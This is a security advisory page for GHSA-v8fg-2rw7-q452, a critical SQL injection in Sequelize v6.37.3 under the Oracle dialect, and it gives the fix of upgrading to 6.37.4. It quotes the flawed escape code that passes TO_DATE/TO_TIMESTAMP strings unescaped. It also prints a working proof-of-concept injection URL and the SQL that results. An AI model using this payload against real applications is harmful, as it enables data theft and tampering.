VDB
KO
CRITICAL 9.8

GHSA-v8fg-2rw7-q452

Sequelize: SQL Injection (Oracle DB)

Quick fix

GHSA-v8fg-2rw7-q452 — sequelize: upgrade to the fixed version with the command below.

npm install sequelize@6.37.4

Details

### Summary SQL Injection is possible with strings only **if dialect is set to `oracle`**. The vulnerability was confirmed on Sequelize v6.37.3.

### Details The `escape` function defined in `sql-string.js` does not escape quotes if the value starts with `TO_TIMESTAMP` or `TO_DATE`.

```javascript } else if (dialect === 'oracle' && typeof val === 'string') { if (val.startsWith('TO_TIMESTAMP') || val.startsWith('TO_DATE')) { return val; } val = val.replace(/'/g, "''"); } ```

### PoC Suppose the application has the following code:

```javascript var result = await models.Student.findOne({ where: { firstName: req.query.firstName } }); ```

An attacker can inject arbitrary sql expressions.

`http://host/path?firstName=TO_DATE('0','Y')||'' OR 1=1--`

The resulted SQL will be:

```SQL SELECT ... WHERE "Student"."firstName" = TO_DATE('0','Y')||'' OR 1=1-- ORDER BY "Student"."id" OFFSET 0 ROWS FETCH NEXT 1 ROWS ONLY; ```

### Impact Data theft and tampering.

Are you affected?

Enter the version of the package you're using.

Affected packages

npm / sequelize
Introduced in: 0 Fixed in: 6.37.4
Fix npm install sequelize@6.37.4

References